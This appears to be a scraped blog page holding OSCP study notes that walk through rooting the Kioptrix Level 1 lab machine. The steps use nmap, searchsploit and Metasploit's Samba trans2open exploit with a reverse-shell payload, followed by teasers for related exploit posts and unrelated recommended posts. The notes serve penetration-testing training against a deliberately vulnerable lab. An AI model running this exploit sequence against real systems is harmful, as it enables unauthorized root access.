Gaining Root with Metasploit

Platform: Kali Linux, Kioptrix Level 1

1. Find the IP of Kioptirx

nmap 10.0.0.0/24 -n -sP -sn

2. Scan the Kioptrix server and analyst the result.

nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN /root/kioptrix1_detailed.txt 10.0.0.20

3. Search samba exploit methods.

searchsploit samba 2.2

4. Open Metasploit.

msfconsole

5. Search and use the suitable module.

use exploit/linux/samba/trans2open

6. Set the metasploit options.

set rhost 10.0.0.20

7. Start the exploit but failed in the end.

exploit

8. Set the payload and Try gain.

set payload generic/shell_reverse_tcp

Root the target server.

OSCP Learning Notes - Exploit(1)的更多相关文章

  1. OSCP Learning Notes - Exploit(4)

    Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social- ...

  2. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

  3. OSCP Learning Notes - Exploit(2)

    Compiling an Exploit Exercise: samba exploit 1. Search and download the samba exploit source code fr ...

  4. OSCP Learning Notes - Exploit(9)

    Tool: Metasploit 1. Start the msfconsole tool. msfconsole 2.Search ssh related modules. 3.Use the &q ...

  5. OSCP Learning Notes - Exploit(8)

    Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret se ...

  6. OSCP Learning Notes - Exploit(7)

    Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options ...

  7. OSCP Learning Notes - Exploit(6)

    Antivirus Bypassing Tools: Kali Linux Detection Platform: https://www.virustotal.com/gui/home/upload ...

  8. OSCP Learning Notes - Exploit(5)

    Java Applet Attacks Download virtual machines from the following website: https://developer.microsof ...

  9. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

随机推荐

  1. deepin文件用途

    Bin:二进制文件, 存放二进制文件Dev:存放外接设备,其中外接设备不能被直接使用需要挂载(启动设备)Etc:存放配置文件Home:家目录,出了root用户外的其他用户类似于Windows中的use ...

  2. CSS中可以继承的元素(需要记住)

    可以继承的属性很少,只有颜色,文字,字体间距行高对齐方式,和列表的样式可以继承. 所有元素可继承:visibility和cursor. 内联元素可继承:letter-spacing.word-spac ...

  3. 无法解析的外部符号 "public: virtual struct CRuntimeClass * _

    SetupPropertyPage.obj : error LNK2001: 无法解析的外部符号 "public: virtual struct CRuntimeClass * __this ...

  4. 4a-c++ primer宽字符wchar_t显示设置与输出代码示例

    .. #include <iostream> #include <windows.h> #include <locale> //#include<wchar. ...

  5. Redis 数据结构 之 SDS

    SDS(simple dynamic string),简单动态字符串.s同时它被称为 Hacking String.hack 的地方就在 sds 保存了字符串的长度以及剩余空间.sds 的实现在 sd ...

  6. [转]IP地址和MAV地址——区别和联系

    [转载]http://wenda.tianya.cn/question/27f9476d1e86f6b6 一.IP地址  对于IP地址,相信大家都很熟悉,即指使用TCP/IP协议指定给主机的32位地址 ...

  7. 12.DRF-节流

    Django rest framework源码分析(3)----节流 添加节流 自定义节流的方法 限制60s内只能访问3次 (1)API文件夹下面新建throttle.py,代码如下: # utils ...

  8. hello python week one

    python的注释 好的pytho程序员不一定非要追求 代码的简短,代码的可读性也是至关重要的 与用户交互 输入 input 会将输入内容转化为字符串 输出 print 格式化输出 %d %s 占位符 ...

  9. Python 简明教程 --- 8,Python 字符串函数

    微信公众号:码农充电站pro 个人主页:https://codeshellme.github.io 好代码本身就是最好的文档.当你需要添加一个注释时,你应该考虑如何修改代码才能不需要注释. -- St ...

  10. ceph bluestore与 filestore 数据存放的区别

    一. filestore 对象所在的PG以文件方式放在xfs文件中 1 查看所有的osd硬盘,跟其他linux其他硬盘一样,被挂载一个目录中. [root@hz-storage1 ~]# df -h ...